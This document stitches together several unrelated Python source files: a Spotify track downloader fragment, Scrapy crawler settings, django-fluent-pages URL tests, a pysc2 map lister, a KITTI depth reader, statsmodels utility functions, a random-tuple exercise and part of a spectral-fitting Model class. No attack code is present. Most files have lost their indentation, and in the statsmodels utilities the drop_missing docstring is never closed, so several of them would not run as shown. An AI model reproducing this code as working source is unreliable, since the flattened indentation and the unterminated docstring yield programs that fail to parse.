dic['audio_features'] = self.audio_features
#save
downloader.write_json_to_file(filename, dic)
if __name__ == '__main__':
d = Downloader(setup.get_spotify_username())
sonne = Track(d.read_json_from_file('sonne.json'))
sonne.load_additional_song_data(d)
sonne.save()
|
# -*- coding: utf-8 -*-
# Scrapy settings for news_comment_spider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'news_comment_spider'
SPIDER_MODULES = ['news_comment_spider.spiders']
NEWSPIDER_MODULE = 'news_comment_spider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'news_comment_spider (+http://www.yourdomain.com)'
USER_AGENT_LIST = [
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
import random
USER_AGENT = random.choice(USER_AGENT_LIST)
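# NOTE: random.choice runs once, when this settings module is imported, so a
# single user agent is used for the entire crawl; rotating per request would
# require a downloader middleware instead.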
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'news_comment_spider.middlewares.NewsCommentSpiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'news_comment_spider.middlewares.NewsCommentSpiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'news_comment_spider.pipelines.NewsCommentSpiderPipeline': 300,
'news_comment_spider.pipelines.SentimentCalculationPipeline': 400,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
import django
from fluent_pages.tests.testapp.models import WebShopPage
from fluent_pages.tests.utils import AppTestCase, override_settings
from fluent_pages.urlresolvers import app_reverse, mixed_reverse, PageTypeNotMounted, MultipleReverseMatch
class PluginTests(AppTestCase):
"""
Test cases for plugins
"""
@classmethod
def setUpTree(cls):
WebShopPage.objects.create(title="Shop1", slug="shop", status=WebShopPage.PUBLISHED, author=cls.user)
def test_app_page_urlconf(self):
"""
        App pages should have a URL resolver that returns the custom views.
"""
from fluent_pages.tests.testapp.page_type_plugins import WebShopPagePlugin
from fluent_pages.tests.testapp.urls_webshop import webshop_index
self.assertEqual(WebShopPagePlugin.urls, 'fluent_pages.tests.testapp.urls_webshop')
# See if the page points to the proper URL resolver
shop = WebShopPage.objects.all()[0]
resolver = shop.plugin.get_url_resolver()
        self.assertIsNotNone(resolver, "App pages should have a URL resolver")
# See if the URL resolver returns the proper functions
match = resolver.resolve('/')
self.assertEqual(match.func, webshop_index)
# TODO: test more stuff.
# e.g. registration API, supported fields, expected available API functions
def test_app_reverse(self):
"""
The app_reverse function should find the proper CMS page where the app is mounted.
"""
self.assertEqual(WebShopPage.objects.published().count(), 1)
self.assertEqual(app_reverse('webshop_index'), '/shop/')
self.assertEqual(app_reverse('webshop_article', kwargs={'slug': 'foobar'}), '/shop/foobar/')
self.assertEqual(mixed_reverse('webshop_index'), '/shop/')
self.assertEqual(mixed_reverse('webshop_article', kwargs={'slug': 'foobar'}), '/shop/foobar/')
def test_app_reverse_multiple(self):
"""
The app_reverse functions should support multiple mount points for an app.
"""
shop2 = WebShopPage.objects.create(title="Shop2", slug="shop2", status=WebShopPage.PUBLISHED, author=self.user)
self.assertEqual(WebShopPage.objects.published().count(), 2)
# There are now 2 mount points, the functions should detect that
self.assertRaises(MultipleReverseMatch, lambda: app_reverse('webshop_index'))
self.assertRaises(MultipleReverseMatch, lambda: mixed_reverse('webshop_index'))
# The functions have a 'current_page' parameter that allows relative resolving.
# This is designed for template functions, to allow resolving relative to the current page node.
self.assertEqual(app_reverse('webshop_index', current_page=shop2), '/shop2/')
self.assertEqual(app_reverse('webshop_article', current_page=shop2, kwargs={'slug': 'foobar'}), '/shop2/foobar/')
self.assertEqual(mixed_reverse('webshop_index', current_page=shop2), '/shop2/')
self.assertEqual(mixed_reverse('webshop_article', current_page=shop2, kwargs={'slug': 'foobar'}), '/shop2/foobar/')
def test_app_reverse_multiple_language(self):
"""
The app_reverse functions should skip pages that are not translated in the current language.
"""
# Recreate models for clarity
for page in WebShopPage.objects.all():
page.delete() # Allow signals to be sent, and clear caches
WebShopPage.objects.language('en').create(title="Shop3-en", slug="shop3-en", status=WebShopPage.PUBLISHED, author=self.user)
WebShopPage.objects.language('fr').create(title="Shop4-fr", slug="shop4-fr", status=WebShopPage.PUBLISHED, author=self.user)
self.assertEqual(WebShopPage.objects.published().count(), 2)
# Depending on the language, multiple objects can be found.
# This tests whether _get_pages_of_type() properly filters the language.
self.assertEqual(app_reverse('webshop_index', language_code='en'), '/shop3-en/')
self.assertRaises(MultipleReverseMatch, lambda: app_reverse('webshop_index', language_code='fr'))
def test_app_reverse_unmounted(self):
"""
The app_reverse functions should raise an exception when the pagetype is not added in the page tree.
"""
for page in WebShopPage.objects.all():
page.delete() # Allow signals to be sent, and clear caches
self.assertEqual(WebShopPage.objects.published().count(), 0)
self.assertRaises(PageTypeNotMounted, lambda: app_reverse('webshop_index'))
self.assertRaises(PageTypeNotMounted, lambda: mixed_reverse('webshop_index'))
class PluginUrlTests(AppTestCase):
"""
Test for running a pagetype app standalone.
(some apps will support that, e.g. django-fluent-blogs)
"""
if django.VERSION < (1, 8):
urls = 'fluent_pages.tests.testapp.urls_webshop'
@override_settings(ROOT_URLCONF='fluent_pages.tests.testapp.urls_webshop')
def test_mixed_reverse_standalone(self):
"""
When a custom app is not hooked via the CMS page tree, mixed_reverse() should still work.
"""
self.assertRaises(PageTypeNotMounted, lambda: app_reverse('webshop_index'))
self.assertEqual(mixed_reverse('webshop_index'), '/')
self.assertEqual(mixed_reverse('webshop_article', kwargs={'slug': 'foobar'}), '/foobar/')
|
#!/usr/bin/python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Print the list of available maps according to the game."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from ctools.pysc2 import run_configs
def main(unused_argv):
with run_configs.get().start(want_rgb=False) as controller:
available_maps = controller.available_maps()
print("\n")
print("Local map paths:")
for m in sorted(available_maps.local_map_paths):
print(" ", m)
print()
print("Battle.net maps:")
for m in sorted(available_maps.battlenet_map_names):
print(" ", m)
if __name__ == "__main__":
app.run(main)
|
#!/usr/bin/python
from PIL import Image
import numpy as np
def depth_read(filename):
# loads depth map D from png file
# and returns it as a numpy array,
# for details see readme.txt
depth_png = np.array(Image.open(filename), dtype=int)
    # make sure we have a proper 16-bit depth map here, not 8-bit!
    assert np.max(depth_png) > 255, 'Expected a 16-bit depth map, got 8-bit'
depth = depth_png.astype(np.float32) / 256.
depth[depth_png == 0] = -1.
return depth
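# A minimal usage sketch (the path below is hypothetical; any KITTI-style
# 16-bit depth PNG works):
# depth = depth_read('data/depth/0000000005.png')
# valid = depth >= 0  # pixels equal to -1. carry no depth measurement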
|
'''
Utility functions models code
'''
import numpy as np
import numpy.lib.recfunctions as nprf
import numpy.linalg as L
from scipy.interpolate import interp1d
from scipy.linalg import svdvals
from statsmodels.distributions import (ECDF, monotone_fn_inverter,
StepFunction)
from statsmodels.tools.data import _is_using_pandas
from statsmodels.compatnp.py3k import asstr2
from pandas import DataFrame
def _make_dictnames(tmp_arr, offset=0):
"""
Helper function to create a dictionary mapping a column number
to the name in tmp_arr.
"""
col_map = {}
for i,col_name in enumerate(tmp_arr):
col_map.update({i+offset : col_name})
return col_map
def drop_missing(Y,X=None, axis=1):
"""
    Returns views on the arrays Y and X where missing observations are dropped.

    Parameters
    ----------
    Y : array-like
    X : array-like, optional
    axis : int
        Axis along which to look for missing observations. Default is 1, i.e.,
        observations in rows.

    Returns
    -------
    Y : array
        The rows of Y with no missing observations (and, if X is given, where
        X also has none).
    X : array
        The corresponding rows of X; only returned if X was given.

    Notes
    -----
    If either Y or X is 1d, it is reshaped to be 2d.
Y = np.asarray(Y)
if Y.ndim == 1:
Y = Y[:,None]
if X is not None:
X = np.array(X)
if X.ndim == 1:
X = X[:,None]
keepidx = np.logical_and(~np.isnan(Y).any(axis),~np.isnan(X).any(axis))
return Y[keepidx], X[keepidx]
else:
keepidx = ~np.isnan(Y).any(axis)
return Y[keepidx]
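# e.g. (a sketch): drop_missing(np.array([1., np.nan, 3.])) reshapes the 1d
# input to 2d and drops the NaN row, returning array([[1.], [3.]])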
#TODO: needs to better preserve dtype and be more flexible
# ie., if you still have a string variable in your array you don't
# want to cast it to float
#TODO: add name validator (ie., bad names for datasets.grunfeld)
def categorical(data, col=None, dictnames=False, drop=False, ):
'''
Returns a dummy matrix given an array of categorical variables.
Parameters
----------
data : array
A structured array, recarray, or array. This can be either
a 1d vector of the categorical variable or a 2d array with
the column specifying the categorical variable specified by the col
argument.
    col : str, int, or None
If data is a structured array or a recarray, `col` can be a string
that is the name of the column that contains the variable. For all
arrays `col` can be an int that is the (zero-based) column index
number. `col` can only be None for a 1d array. The default is None.
dictnames : bool, optional
If True, a dictionary mapping the column number to the categorical
name is returned. Used to have information about plain arrays.
    drop : bool
        If True, the original categorical variable is dropped from the
        returned matrix.
Returns
--------
dummy_matrix, [dictnames, optional]
A matrix of dummy (indicator/binary) float variables for the
categorical data. If dictnames is True, then the dictionary
is returned as well.
Notes
-----
    This returns a dummy variable for EVERY distinct variable. If a
    structured or recarray is provided, the names for the new variables are the
    old variable name - underscore - category name. So if a variable
    'vote' had answers of 'yes' or 'no', then the returned array would have two
    new variables -- 'vote_yes' and 'vote_no'. There is currently
    no name checking.
Examples
--------
>>> import numpy as np
>>> import statsmodels.api as sm
Univariate examples
>>> import string
>>> string_var = [string.lowercase[0:5], string.lowercase[5:10], \
string.lowercase[10:15], string.lowercase[15:20], \
string.lowercase[20:25]]
>>> string_var *= 5
>>> string_var = np.asarray(sorted(string_var))
>>> design = sm.tools.categorical(string_var, drop=True)
Or for a numerical categorical variable
>>> instr = np.floor(np.arange(10,60, step=2)/10)
>>> design = sm.tools.categorical(instr, drop=True)
With a structured array
>>> num = np.random.randn(25,2)
>>> struct_ar = np.zeros((25,1), dtype=[('var1', 'f4'),('var2', 'f4'), \
('instrument','f4'),('str_instr','a5')])
>>> struct_ar['var1'] = num[:,0][:,None]
>>> struct_ar['var2'] = num[:,1][:,None]
>>> struct_ar['instrument'] = instr[:,None]
>>> struct_ar['str_instr'] = string_var[:,None]
>>> design = sm.tools.categorical(struct_ar, col='instrument', drop=True)
Or
>>> design2 = sm.tools.categorical(struct_ar, col='str_instr', drop=True)
'''
if isinstance(col, (list, tuple)):
try:
assert len(col) == 1
col = col[0]
        except Exception:
raise ValueError("Can only convert one column at a time")
#TODO: add a NameValidator function
# catch recarrays and structured arrays
if data.dtype.names or data.__class__ is np.recarray:
if not col and np.squeeze(data).ndim > 1:
raise IndexError("col is None and the input array is not 1d")
if isinstance(col, int):
col = data.dtype.names[col]
if col is None and data.dtype.names and len(data.dtype.names) == 1:
col = data.dtype.names[0]
tmp_arr = np.unique(data[col])
# if the cols are shape (#,) vs (#,1) need to add an axis and flip
_swap = True
if data[col].ndim == 1:
tmp_arr = tmp_arr[:,None]
_swap = False
tmp_dummy = (tmp_arr==data[col]).astype(float)
if _swap:
tmp_dummy = np.squeeze(tmp_dummy).swapaxes(1,0)
if not tmp_arr.dtype.names: # how do we get to this code path?
tmp_arr = [asstr2(item) for item in np.squeeze(tmp_arr)]
elif tmp_arr.dtype.names:
tmp_arr = [asstr2(item) for item in np.squeeze(tmp_arr.tolist())]
# prepend the varname and underscore, if col is numeric attribute lookup
# is lost for recarrays...
if col is None:
try:
col = data.dtype.names[0]
        except Exception:
col = 'var'
#TODO: the above needs to be made robust because there could be many
        # var_yes, var_no variables for instance.
tmp_arr = [col + '_'+ item for item in tmp_arr]
#TODO: test this for rec and structured arrays!!!
if drop is True:
if len(data.dtype) <= 1:
if tmp_dummy.shape[0] < tmp_dummy.shape[1]:
tmp_dummy = np.squeeze(tmp_dummy).swapaxes(1,0)
dt = zip(tmp_arr, [tmp_dummy.dtype.str]*len(tmp_arr))
# preserve array type
return np.array(map(tuple, tmp_dummy.tolist()),
dtype=dt).view(type(data))
data=nprf.drop_fields(data, col, usemask=False,
asrecarray=type(data) is np.recarray)
data=nprf.append_fields(data, tmp_arr, data=tmp_dummy,
usemask=False, asrecarray=type(data) is np.recarray)
return data
# handle ndarrays and catch array-like for an error
elif data.__class__ is np.ndarray or not isinstance(data,np.ndarray):
if not isinstance(data, np.ndarray):
raise NotImplementedError("Array-like objects are not supported")
if isinstance(col, int):
offset = data.shape[1] # need error catching here?
tmp_arr = np.unique(data[:,col])
tmp_dummy = (tmp_arr[:,np.newaxis]==data[:,col]).astype(float)
tmp_dummy = tmp_dummy.swapaxes(1,0)
if drop is True:
offset -= 1
data = np.delete(data, col, axis=1).astype(float)
data = np.column_stack((data,tmp_dummy))
if dictnames is True:
col_map = _make_dictnames(tmp_arr, offset)
return data, col_map
return data
elif col is None and np.squeeze(data).ndim == 1:
tmp_arr = np.unique(data)
tmp_dummy = (tmp_arr[:,None]==data).astype(float)
tmp_dummy = tmp_dummy.swapaxes(1,0)
if drop is True:
if dictnames is True:
col_map = _make_dictnames(tmp_arr)
return tmp_dummy, col_map
return tmp_dummy
else:
data = np.column_stack((data, tmp_dummy))
if dictnames is True:
col_map = _make_dictnames(tmp_arr, offset=1)
return data, col_map
return data
else:
raise IndexError("The index %s is not understood" % col)
def _series_add_constant(data, prepend):
const = np.ones_like(data)
const.name = 'const'
if not prepend:
results = DataFrame([data, const]).T
results.columns = [data.name, 'const']
else:
results = DataFrame([const, data]).T
results.columns = ['const', data.name]
return results
def _dataframe_add_constant(data, prepend):
# check for const.
    if np.any(data.var(0) == 0):
return data
if prepend:
data.insert(0, 'const', 1)
else:
data['const'] = 1
return data
def _pandas_add_constant(data, prepend):
from pandas import Series
if isinstance(data, Series):
return _series_add_constant(data, prepend)
else:
return _dataframe_add_constant(data, prepend)
#TODO: add an axis argument to this for sysreg
def add_constant(data, prepend=True):
'''
    Adds a column of ones to an array. The constant is prepended by default;
    set prepend=False to append it instead.
    For ndarrays and pandas.DataFrames, checks to make sure a constant is not
    already included. If there is at least one column of ones then the
    original object is returned. Does not check for a constant if a structured
    array or recarray is given.
Parameters
----------
data : array-like
`data` is the column-ordered design matrix
prepend : bool
        If True, the constant is prepended rather than appended.
Returns
-------
data : array
The original array with a constant (column of ones) as the first or
last column.
'''
if _is_using_pandas(data, None):
# work on a copy
return _pandas_add_constant(data.copy(), prepend)
else:
data = np.asarray(data)
if not data.dtype.names:
var0 = data.var(0) == 0
if np.any(var0):
return data
data = np.column_stack((data, np.ones((data.shape[0], 1))))
if prepend:
return np.roll(data, 1, 1)
else:
return_rec = data.__class__ is np.recarray
if prepend:
ones = np.ones((data.shape[0], 1), dtype=[('const', float)])
data = nprf.append_fields(ones, data.dtype.names, [data[i] for
i in data.dtype.names], usemask=False, asrecarray=return_rec)
else:
data = nprf.append_fields(data, 'const', np.ones(data.shape[0]),
usemask=False, asrecarray = return_rec)
return data
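# e.g. (a sketch): add_constant(np.arange(5.)) returns a (5, 2) array whose
# first column is the constant (all ones) and whose second column is the data.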
def isestimable(C, D):
""" True if (Q, P) contrast `C` is estimable for (N, P) design `D`
From an Q x P contrast matrix `C` and an N x P design matrix `D`, checks if
the contrast `C` is estimable by looking at the rank of ``vstack([C,D])``
and verifying it is the same as the rank of `D`.
Parameters
----------
C : (Q, P) array-like
        contrast matrix. If `C` is 1 dimensional, assume shape (1, P)
    D : (N, P) array-like
design matrix
Returns
-------
tf : bool
True if the contrast `C` is estimable on design `D`
Examples
--------
>>> D = np.array([[1, 1, 1, 0, 0, 0],
... [0, 0, 0, 1, 1, 1],
... [1, 1, 1, 1, 1, 1]]).T
>>> isestimable([1, 0, 0], D)
False
>>> isestimable([1, -1, 0], D)
True
"""
C = np.asarray(C)
D = np.asarray(D)
if C.ndim == 1:
C = C[None, :]
if C.shape[1] != D.shape[1]:
raise ValueError('Contrast should have %d columns' % D.shape[1])
new = np.vstack([C, D])
if rank(new) != rank(D):
return False
return True
def recipr(X):
"""
Return the reciprocal of an array, setting all entries less than or
equal to 0 to 0. Therefore, it presumes that X should be positive in
general.
"""
x = np.maximum(np.asarray(X).astype(np.float64), 0)
return np.greater(x, 0.) / (x + np.less_equal(x, 0.))
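# e.g. (a sketch):
# >>> recipr(np.array([-1., 0., 2.]))
# array([0. , 0. , 0.5])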
def recipr0(X):
"""
Return the reciprocal of an array, setting all entries equal to 0
as 0. It does not assume that X should be positive in
general.
"""
test = np.equal(np.asarray(X), 0)
return np.where(test, 0, 1. / X)
def clean0(matrix):
"""
Erase columns of zeros: can save some time in pseudoinverse.
"""
colsum = np.add.reduce(matrix**2, 0)
val = [matrix[:,i] for i in np.flatnonzero(colsum)]
return np.array(np.transpose(val))
def rank(X, cond=1.0e-12):
"""
Return the rank of a matrix X based on its generalized inverse,
not the SVD.
"""
X = np.asarray(X)
if len(X.shape) == 2:
D = svdvals(X)
return int(np.add.reduce(np.greater(D / D.max(), cond).astype(np.int32)))
else:
return int(not np.alltrue(np.equal(X, 0.)))
def fullrank(X, r=None):
"""
Return a matrix whose column span is the same as X.
If the rank of X is known it can be specified as r -- no check
is made to ensure that this really is the rank of X.
"""
if r is None:
r = rank(X)
V, D, U = L.svd(X, full_matrices=0)
order = np.argsort(D)
order = order[::-1]
value = []
for i in range(r):
value.append(V[:,order[i]])
return np.asarray(np.transpose(value)).astype(np.float64)
StepFunction = np.deprecate(StepFunction,
old_name = 'statsmodels.tools.tools.StepFunction',
new_name = 'statsmodels.distributions.StepFunction')
monotone_fn_inverter = np.deprecate(monotone_fn_inverter,
old_name = 'statsmodels.tools.tools.monotone_fn_inverter',
new_name = 'statsmodels.distributions.monotone_fn_inverter')
ECDF = np.deprecate(ECDF,
old_name = 'statsmodels.tools.tools.ECDF',
new_name = 'statsmodels.distributions.ECDF')
def unsqueeze(data, axis, oldshape):
"""
Unsqueeze a collapsed array
>>> from numpy import mean
>>> from numpy.random import standard_normal
>>> x = standard_normal((3,4,5))
>>> m = mean(x, axis=1)
>>> m.shape
(3, 5)
>>> m = unsqueeze(m, 1, x.shape)
>>> m.shape
(3, 1, 5)
>>>
"""
newshape = list(oldshape)
newshape[axis] = 1
return data.reshape(newshape)
def chain_dot(*arrs):
"""
Returns the dot product of the given matrices.
Parameters
----------
arrs: argument list of ndarray
Returns
-------
Dot product of all arguments.
Example
-------
>>> import numpy as np
>>> from statsmodels.tools import chain_dot
>>> A = np.arange(1,13).reshape(3,4)
>>> B = np.arange(3,15).reshape(4,3)
>>> C = np.arange(5,8).reshape(3,1)
>>> chain_dot(A,B,C)
array([[1820],
[4300],
[6780]])
"""
return reduce(lambda x, y: np.dot(y, x), arrs[::-1])
def webuse(data, baseurl='http://www.stata-press.com/data/r11/', as_df=True):
"""
Parameters
----------
data : str
Name of dataset to fetch.
baseurl : str
The base URL to the stata datasets.
as_df : bool
If True, returns a `pandas.DataFrame`
Returns
-------
dta : Record Array
A record array containing the Stata dataset.
Examples
--------
>>> dta = webuse('auto')
Notes
-----
Make sure baseurl has trailing forward slash. Doesn't do any
error checking in response URLs.
"""
# lazy imports
from statsmodels.iolib import genfromdta
from urllib2 import urlopen
from urlparse import urljoin
from StringIO import StringIO
url = urljoin(baseurl, data+'.dta')
dta = urlopen(url)
    #TODO: this isn't Python 3 compatible since urlopen returns bytes?
dta = StringIO(dta.read()) # make it truly file-like
if as_df: # could make this faster if we don't process dta twice?
from pandas import DataFrame
return DataFrame.from_records(genfromdta(dta))
else:
return genfromdta(dta)
def nan_dot(A, B):
"""
Returns np.dot(left_matrix, right_matrix) with the convention that
nan * 0 = 0 and nan * x = nan if x != 0.
Parameters
----------
A, B : np.ndarrays
"""
# Find out who should be nan due to nan * nonzero
should_be_nan_1 = np.dot(np.isnan(A), (B != 0))
should_be_nan_2 = np.dot((A != 0), np.isnan(B))
should_be_nan = should_be_nan_1 + should_be_nan_2
# Multiply after setting all nan to 0
# This is what happens if there were no nan * nonzero conflicts
C = np.dot(np.nan_to_num(A), np.nan_to_num(B))
C[should_be_nan] = np.nan
return C
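# A quick sanity check of the nan * 0 = 0 convention (a sketch, not a test):
# >>> A = np.array([[np.nan, 0.], [1., 2.]])
# >>> nan_dot(A, np.eye(2))
# array([[nan,  0.], [ 1.,  2.]])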
|
# Create a program that generates five random numbers and puts them in a tuple.
# Then, display the generated numbers and also indicate the smallest and
# largest values in the tuple.
from random import randrange
tupla = (randrange(0, 11), randrange(0, 11), randrange(0, 11), randrange(0, 11), randrange(0, 11))
print(f'The randomly generated numbers are: {tupla}')
print(f'The smallest number: {min(tupla)}')
print(f'The largest number: {max(tupla)}')
|
import numpy as np
from tqdm import tqdm
import sys
import tensorflow.compat.v1 as tf
import h5py
T = tf.float64
tf.disable_v2_behavior()
from .utils import bin_data, doppler, get_session
from .interp import interp
from .history import History
import os
pwd = os.path.dirname(os.path.realpath(__file__))+'/'
class Model(object):
"""
Keeps track of all components in the model.
Model is specific to order `r` of data object `data`.
Parameters
----------
data : `object`
a wobble Data object
results: `object`
a wobble Results object
r : `int`
the index of the order to be fit in Data
"""
def __init__(self, data, results, r):
self.components = []
self.component_names = []
self.data = data
self.results = results
self.r = r # order index
self.order = data.orders[r] # order number
def __repr__(self):
string = 'wobble.Model for order {0} consisting of the following components: '.format(self.order)
for i,c in enumerate(self.components):
string += '\n{0}: {1}; '.format(i, c.name)
if c.rvs_fixed:
string += 'RVs fixed; '
else:
string += 'RVs variable; '
string += '{0} variable basis components'.format(c.K)
return string
def add_component(self, name, starting_rvs, epochs=None, **kwargs):
"""
Append a new Component object to the model.
Parameters
----------
name : `str`
The name of the component. Must be unique.
starting_rvs : `np.ndarray`
N-epoch length vector of initial guesses for RVs; will be used
to stack & average data resids for initialization of the template.
epochs : `np.ndarray`
Indices between 0:N denoting epochs where this component is present
in the data. Defaults to all N epochs.
**kwargs : `dict`
Keywords to be passed to wobble.Component()
"""
if np.isin(name, self.component_names):
print("The model already has a component named {0}. Try something else!".format(name))
return
if epochs is None: # component is used in all data epochs by default
epoch_mask = np.ones(self.data.N, dtype='bool')
else:
epoch_mask = np.isin(np.arange(self.data.N), epochs)
starting_rvs[~epoch_mask] = np.nan # NaNs at unused epochs for initialization
c = Component(name, self.r, starting_rvs, epoch_mask, **kwargs)
self.components.append(c)
self.component_names.append(name)
if not np.isin(name, self.results.component_names):
self.results.add_component(c)
def add_star(self, name, starting_rvs=None, **kwargs):
"""
Convenience function to add a component with RVs initialized to zero
in the barycentric-corrected rest frame.
Will have regularization parameters and learning rates set to default values
for a stellar spectrum.
"""
if starting_rvs is None:
starting_rvs = -1. * np.copy(self.data.bervs) + np.mean(self.data.bervs)
kwargs['regularization_par_file'] = kwargs.get('regularization_par_file',
pwd+'regularization/default_star.hdf5')
kwargs['learning_rate_template'] = kwargs.get('learning_rate_template', 0.1)
self.add_component(name, starting_rvs, **kwargs)
def add_telluric(self, name, starting_rvs=None, **kwargs):
"""
Convenience function to add a component with RVs fixed to zero
in the observatory rest frame. Component contribution scales with airmass by default.
Will have regularization parameters and learning rates set to default values
for a telluric spectrum.
"""
if starting_rvs is None:
starting_rvs = np.zeros(self.data.N)
kwargs['learning_rate_template'] = kwargs.get('learning_rate_template', 0.01)
kwargs['scale_by_airmass'] = kwargs.get('scale_by_airmass', True)
kwargs['rvs_fixed'] = kwargs.get('rvs_fixed', True)
kwargs['regularization_par_file'] = kwargs.get('regularization_par_file',
pwd+'regularization/default_t.hdf5')
self.add_component(name, starting_rvs, **kwargs)
def add_continuum(self, degree, **kwargs):
"""Untested code for adding a continuum component."""
if np.isin("continuuum", self.component_names):
print("The model already has a continuum component.")
return
c = Continuum(self.r, self.data.N, degree, **kwargs)
self.components.append(c)
self.component_names.append(c.name)
if not np.isin(c.name, self.results.component_names):
self.results.add_component(c)
def initialize_templates(self):
"""Initialize spectral templates for all components.
*NOTE:* this will initialize each subsequent component from the residuals
of the previous, so make sure you have added the components in order of
largest to smallest contribution to the net spectrum.
"""
data_xs = self.data.xs[self.r]
data_ys = np.copy(self.data.ys[self.r])
data_ivars = np.copy(self.data.ivars[self.r])
assert False not in np.isfinite(data_xs), "Non-finite value(s) or NaN(s) in wavelengths."
assert False not in np.isfinite(data_ys), "Non-finite value(s) or NaN(s) in log spectral values."
assert False not in np.isfinite(data_ivars), "Non-finite value(s) or NaN(s) in inverse variance."
for c in self.components:
data_ys = c.initialize_template(data_xs, data_ys, data_ivars)
def setup(self):
"""Initialize component templates and do TensorFlow magic in prep for optimizing"""
#with tf.GradientTape() as gtape:
# So I think gtape needs to be a thing for all of this so it knows to watch these variables
self.initialize_templates()
self.synth = tf.zeros(np.shape(self.data.xs[self.r]), dtype=T, name='synth')
for c in self.components:
c.setup(self.data, self.r)
self.synth = tf.add(self.synth, c.synth, name='synth_add_{0}'.format(c.name))
self.nll = 0.5*tf.reduce_sum(tf.square(tf.constant(self.data.ys[self.r], dtype=T)
- self.synth, name='nll_data-model_sq')
* tf.constant(self.data.ivars[self.r], dtype=T), name='nll_reduce_sum')
for c in self.components:
self.nll = tf.add(self.nll, c.nll, name='nll_add_{0}'.format(c.name))
# Set up optimizers
self.updates = []
for c in self.components:
if not c.template_fixed:
c.dnll_dtemplate_ys = tf.gradients(self.nll, c.template_ys)
#c.dnll_dtemplate_ys = gtape.gradient(self.nll, c.template_ys)
c.opt_template = tf.train.AdamOptimizer(c.learning_rate_template).minimize(self.nll,
var_list=[c.template_ys], name='opt_minimize_template_{0}'.format(c.name))
self.updates.append(c.opt_template)
if not c.rvs_fixed:
c.dnll_drvs = tf.gradients(self.nll, c.rvs)
#c.dnll_drvs = gtape.gradient(self.nll, c.rvs)
c.opt_rvs = tf.train.AdamOptimizer(learning_rate=c.learning_rate_rvs,
epsilon=1.).minimize(self.nll,
var_list=[c.rvs], name='opt_minimize_rvs_{0}'.format(c.name))
self.updates.append(c.opt_rvs)
if c.K > 0:
c.opt_basis_vectors = tf.train.AdamOptimizer(c.learning_rate_basis).minimize(self.nll,
var_list=[c.basis_vectors], name='opt_minimize_basis_vectors_{0}'.format(c.name))
self.updates.append(c.opt_basis_vectors)
